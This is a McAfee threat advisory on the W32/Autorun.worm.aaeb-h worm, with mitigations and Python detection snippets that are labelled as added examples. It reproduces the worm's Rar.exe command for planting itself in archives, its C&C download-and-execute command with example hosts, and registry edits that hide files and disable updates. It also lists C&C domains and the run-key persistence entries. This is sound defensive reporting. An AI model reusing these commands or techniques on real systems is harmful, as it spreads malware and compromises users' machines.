McAfee Labs Threat Advisory
W32/Autorun.worm.aaeb-h
August 9, 2013

Summary

W32/Autorun.worm.aaeb-h has the ability to infect removable media devices, as well as mounted network shares. Infection starts either with manual execution of the infected file or simply by navigating to the folders that contain the infected files, whereby the Autorun.inf file can cause automatic execution of the malware. It can also add copies of itself to .zip and .rar archive files. It will also download other malware, or updates to itself, as directed by the C&C server.

Detailed information about the worm, its propagation, and mitigation is given in the following sections:

- Infection and Propagation Vectors
- Characteristics and Symptoms
- Restart Mechanism
- Getting Help from the McAfee Foundstone Services team

Infection and Propagation Vectors

W32/Autorun.worm.aaeb-h spreads by creating copies of itself on removable storage devices and mounted network shares. It also creates an autorun.inf so that it executes automatically when the device is attached to another system with Autorun enabled.

It changes the attributes of the directories on the affected drive to hidden and creates copies of itself with the same filename as each hidden directory. It checks files with the following extensions on the removable drive, changes their attributes to hidden, and creates copies of itself with the same filename as each hidden file:

  mp3 avi wma wmv wav mpg mp4 doc txt pdf xls jpg jpe bmp gif tif png

It makes sure that the hidden files remain hidden in Explorer by setting the ShowSuperHidden registry value to 0:

  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
  ShowSuperHidden = dword:00000000
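The following is an added example, not code from the advisory, that checks one directory listing of a removable drive for the propagation pattern described above: a hidden directory or hidden media/document file sitting next to a visible .exe of the same name, plus the fixed artefacts the advisory names (autorun.inf, the lure filenames, the 0-byte x.mpeg). The Entry type and scan_dir helper are my own; the hidden flag is only populated on Windows, where st_file_attributes exists.

```python
import os
import stat
from dataclasses import dataclass

# Extensions the advisory says the worm hides and impersonates on removable drives.
TARGET_EXTS = {"mp3", "avi", "wma", "wmv", "wav", "mpg", "mp4", "doc", "txt",
               "pdf", "xls", "jpg", "jpe", "bmp", "gif", "tif", "png"}
# Fixed lure filenames the advisory lists (compared case-insensitively).
LURE_NAMES = {"secret.exe", "sexy.exe", "porn.exe", "passwords.exe", "runme.exe"}
HIDDEN_ATTR = getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 2)

@dataclass
class Entry:                      # hypothetical helper type: one directory item
    name: str
    is_dir: bool
    hidden: bool
    size: int

def find_indicators(entries):
    """Return (reason, filename) findings for one directory listing."""
    by_lower = {e.name.lower(): e for e in entries}
    findings = []
    for e in entries:
        low = e.name.lower()
        if low == "autorun.inf":
            findings.append(("autorun.inf present", e.name))
        if low == "x.mpeg" and not e.is_dir and e.size == 0:
            findings.append(("0-byte x.mpeg marker", e.name))
        if low in LURE_NAMES:
            findings.append(("known lure filename", e.name))
        # Decoy pattern: a hidden directory or hidden media/document file next to
        # a visible .exe carrying the same name (with or without the extension).
        stem, _, ext = low.rpartition(".")
        if e.hidden and (e.is_dir or ext in TARGET_EXTS):
            cands = {low + ".exe"} if e.is_dir else {low + ".exe", stem + ".exe"}
            for cand in sorted(cands):
                twin = by_lower.get(cand)
                if twin and not twin.is_dir and not twin.hidden:
                    findings.append(("hidden item shadowed by .exe", twin.name))
    return findings

def scan_dir(path):
    """Build Entry objects from a real directory and check them."""
    entries = []
    for d in os.scandir(path):
        st = d.stat(follow_symlinks=False)
        attrs = getattr(st, "st_file_attributes", 0)   # Windows only
        entries.append(Entry(d.name, d.is_dir(follow_symlinks=False),
                             bool(attrs & HIDDEN_ATTR), st.st_size))
    return find_indicators(entries)
```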
It creates copies of itself with the following filenames:

  Secret.exe
  Sexy.exe
  Porn.exe
  Passwords.Exe
  Runme.exe
  *gy.exe..exe.exe

Users may then unknowingly open the malware files.

It drops the following 0-byte file on the removable device:

  x.mpeg

It adds a copy of itself to .zip and .rar files found on the system. It checks for WinRAR on the system and uses the rar.exe command line tool to add a copy of itself to each .zip or .rar file found, executing Rar.exe with the following command line:

  Rar.exe a -y -ep -IBCK "<rar/zip file found>" "%userprofile%\secret.exe"

The malware copy added to the affected archive has the filename Secret.exe.

Mitigation

- Disable the Autorun feature on Windows. You can do this remotely using Windows Group Policies.
- Restrict the use of USB drives on mission-critical and server machines.
- Create an access protection rule to prevent modification of the ShowSuperHidden registry key listed above.
- Implement and test Access Protection Rules using VirusScan Enterprise to prevent writing of AUTORUN.INF files.

Characteristics and Symptoms

Description

Upon execution it creates a copy of itself at the following path:

  %UserProfile%\[random].exe

Note: %UserProfile% refers to the current user's profile folder.

It changes several bytes in the newly created file in an attempt to avoid anti-virus detection. It then connects to a command and control server to receive commands. Upon connection, the server automatically sends out the command. Currently the command sent is to download and execute files from the given URL.

Command structure observed:

  :.dl [URL] [filename]

Example commands sent by the C&C server:

  :.dl http://<random 6 numbers>.zdns.eu:443/qjvdpnruwp?f google.com
  :.dl http://ks<random 7 numbers>.kimsufi.com

New variants observed use encrypted communication with the server.
When the malware receives the above command, it attempts to download and then execute the downloaded file. The payload files observed so far are mostly from the Zbot and BackDoor families, and they are updated frequently on the server.

HTTP GET requests sent out by the malware when downloading the malicious file pointed to by the server:

  Host: <random 5-digit number>.noip1.de:443
  Host: <random 5-digit number>.noip1.nl:443
  Host: <random 5-digit number>.zdns.eu

  GET /2/?<randomletter> [USERNAME] HTTP/1.1
  Host: <random 5-digit number>.noip1.at

  GET /0/?<randomletter> [USERNAME] HTTP/1.1
  Host: <random 5-digit number>.noip1.at

  GET /uyvsutnie?f HTTP/1.1
  Host: 72010.noip.at

Note: The URL from which it downloads updates or additional malware varies depending on the C&C.

The following are the observed domains of the C&C servers:

  Ns1.helpupdater.net ns1.helpupdater.net ns1.helpchecks.net ns1.helpupdated.com
  ns1.helpupdated.net ns1.helpupdated.org ns1.helpupdatek.at ns1.helpupdatek.eu
  ns1.helpupdatek.tw ns1.helpupdater.net ns1.helpupdates.com ns1.helpupdated.co
  ns1.helpupdated.ne ns1.helpupdated.or ns1.helpupdatek.a ns1.helpupdatek.e
  ns1.thepicturehut.net ns1.player1253.com ns1.videoall.net ns1.mediashares.org
  ns1.helpchecks.net ns1.couchness.com ns1.chopbell.net ns1.chopbell.com
  ns1.helpupdated.net ns1.helpupdated.org ns1.helpupdatek.at ns1.helpupdatek.eu
  ns1.helpupdatek.tw existing.suroot.com 22231.dtdns.net ns1.helpchecks.com
  ns1.cpuchecks.com ns1.timedate1.com ns1.timedate1.net ns1.timedate1.org
  ns1.timedate2.com ns1.timedate2.net ns1.timedate2.org ns1.timedate3.com
  ns1.timedate3.net ns1.timedate3.org ns1.boxonline1.com ns1.boxonline1.net
  ns1.boxonline1.org ns1.boxonline2.com ns1.boxonline2.net ns1.boxonline2.org
  ns1.boxonline3.com ns1.boxonline3.net ns1.boxonline3.org

The following are the observed C&C server TCP ports the malware connected to:

  port 8002
  port 8000
  port 443
  port 80
  port 3128
  port 47221
  port 9004
  port 9904
  port 7005

The malware also randomly uses domain suffixes with the following strings:

  .com .net .org .biz .info .at .eu .by

This malware disables Windows Update by setting the NoAutoUpdate registry value to 1:

  HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
  NoAutoUpdate = dword:00000001

This malware also prevents any process that contains the strings proc and task in its filename from terminating the malware process, by patching a RET instruction over the first instruction of the TerminateThread and TerminateProcess functions.

Mitigation

Users are requested to exercise caution while opening unsolicited emails and unknown files. Users are advised to update Windows and third-party application security patches and virus definitions on a regular basis, and to have proper filtering rules in place:

- If possible, block access to the ports listed above, and monitor and block the mentioned URLs.
- If possible, block any HTTP request whose user-agent string is exactly Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1).
- Create an access protection rule to restrict file dropping to the aforementioned folder.
- Create an access protection rule to prevent file execution from the %UserProfile% folder.
- Create an access protection rule to prevent modification of the NoAutoUpdate registry key listed above.
- Access Protection must be ON and proper rules must be set in order to identify which process is actually responsible for changing the attributes of files and folders.

Restart Mechanism

Description

The following registry entries enable the trojan to execute every time Windows starts:

  <malware name> = "%UserProfile%\<Random name>.exe /e"
  <malware name> = "%UserProfile%\<Random name>.exe /c"
  <malware name> = "%UserProfile%\<Random name>.exe /h"
  <malware name> = "%UserProfile%\<Random name>.exe /p"

Getting Help from the McAfee Foundstone Services team

This document is intended to provide a summary of current intelligence and best practices to ensure the highest level of protection from your McAfee security solution. The McAfee Foundstone Services team offers a full range of strategic and technical consulting services that can further help you identify security risk and build effective solutions to remediate security vulnerabilities. You can reach them here:

  https://secure.mcafee.com/apps/services/services-contact.aspx

2011 McAfee, Inc. All rights reserved.
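The network indicators in the Characteristics and Symptoms section (the 5-digit dynamic-DNS hosts, the /<digit>/?<letter> download paths, the non-standard C&C ports and the exact user-agent string) lend themselves to a proxy-log triage rule. The following is an added example, not code from the advisory; the log line layout (epoch, client IP, method, URL, status, quoted user-agent) and the sample lines are constructed assumptions, and the C&C domain list itself is not encoded here.

```python
import re
from urllib.parse import urlsplit

# Indicators from the advisory. The log line layout is an assumption:
#   <epoch> <client-ip> <method> <url> <status> "<user-agent>"
BAD_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
DYNDNS_HOST = re.compile(r"^\d{5}\.(?:noip1\.(?:de|nl|at)|noip\.at|zdns\.eu)$")
DOWNLOAD_PATH = re.compile(r"^/\d/$")          # GET /2/?<letter>, GET /0/?<letter>
C2_PORTS = {8002, 8000, 443, 80, 3128, 47221, 9004, 9904, 7005}
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) '
                    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$')

def classify(line):
    """Return the list of advisory indicators matched by one proxy log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    u = urlsplit(m["url"])
    host = (u.hostname or "").lower()
    port = u.port or (443 if u.scheme == "https" else 80)
    hits = []
    if m["ua"] == BAD_UA:
        hits.append("exact MSIE 7.0/SV1 user-agent")
    if DYNDNS_HOST.match(host):
        hits.append("5-digit dynamic-DNS host")
    if m["method"] == "GET" and DOWNLOAD_PATH.match(u.path) and u.query[:1].isalpha():
        hits.append("/<digit>/?<letter> download path")
    if port in C2_PORTS and port not in (80, 443):   # 80/443 alone are too noisy
        hits.append(f"non-standard C&C port {port}")
    return hits

def triage(lines):
    """Return (client, url, hits) for every line matching at least one indicator."""
    out = []
    for line in lines:
        hits = classify(line)
        if hits:
            m = LOG_RE.match(line)
            out.append((m["client"], m["url"], hits))
    return out

# Constructed sample log: two lines mimic the advisory's GET patterns, one is benign.
SAMPLE_LOG = """\
1376000001 10.0.0.5 GET http://48213.noip1.at/2/?q 200 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
1376000002 10.0.0.7 GET http://www.example.com/index.html 200 "Mozilla/5.0 (Windows NT 6.1) Firefox/23.0"
1376000003 10.0.0.5 GET http://72010.noip.at:8002/uyvsutnie?f 200 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
"""

if __name__ == "__main__":
    for client, url, hits in triage(SAMPLE_LOG.splitlines()):
        print(client, url, "; ".join(hits))
```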